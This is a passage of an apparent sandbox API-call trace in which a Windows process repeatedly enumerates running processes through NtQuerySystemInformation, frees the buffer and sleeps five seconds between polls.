SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.229] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.229] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.231] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.231] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.232] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.232] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.232] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.236] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.237] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.239] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.239] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.239] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.240] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.240] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.243] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.244] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.246] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.246] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.247] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.248] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.248] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.252] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.252] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.254] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.254] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.255] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.255] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.256] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.259] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.260] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.262] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.262] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.262] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.263] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.263] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.266] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.267] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.269] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.269] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.269] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.270] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.270] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.273] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.274] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.275] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.275] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.276] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.276] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.276] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.280] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.280] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.282] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.282] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.282] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.282] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.283] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.287] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.288] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.290] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.290] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.291] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.291] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.291] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.297] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.298] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.299] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.299] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.300] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.301] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.301] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.304] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.305] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.307] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.307] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.308] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.308] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.309] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.313] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.313] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.315] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.316] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.317] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.365] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.365] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.373] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.375] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.376] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.377] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.378] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.378] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.378] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.383] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.384] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.385] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.386] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.387] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.387] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.387] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.392] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.393] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.394] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.394] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.395] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.395] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.396] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.400] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.402] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.403] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.404] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.405] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.405] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.405] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.412] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.414] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.417] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.417] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.418] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.418] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.418] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.421] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.422] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.424] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.424] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.424] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.425] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.425] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.429] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.429] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.431] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.431] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.431] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.431] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.432] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.435] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.436] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.438] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.438] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.438] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdea88, FreeType=0x8000) returned 0x0 [0249.439] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea50*=0x0, ZeroBits=0x0, RegionSize=0xdea54*=0x20000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea50*=0x1a0000, RegionSize=0xdea54*=0x20000) returned 0x0 [0249.439] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x20000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0x0 [0249.445] NtFreeVirtualMemory (ProcessHandle=0xffffffff, BaseAddress=0xdf0a4*=0x1a0000, RegionSize=0xdf0a8, FreeType=0x8000) returned 0x0 [0249.445] NtDelayExecution (Alertable=0, Interval=0xdea74*=-50000000) returned 0x0 [0249.447] NtAllocateVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0xdea64*=0x0, ZeroBits=0x0, RegionSize=0xdea68*=0x10000, AllocationType=0x1000, Protect=0x4 | out: BaseAddress=0xdea64*=0x1a0000, RegionSize=0xdea68*=0x10000) returned 0x0 [0249.447] NtQuerySystemInformation (in: SystemInformationClass=0x5, SystemInformation=0x1a0000, Length=0x10000, ResultLength=0x0 | out: SystemInformation=0x1a0000, ResultLength=0x0) returned 0xc0000004 [0249.447] NtFreeVirtualMemory (ProcessHandle=0xffffffff, 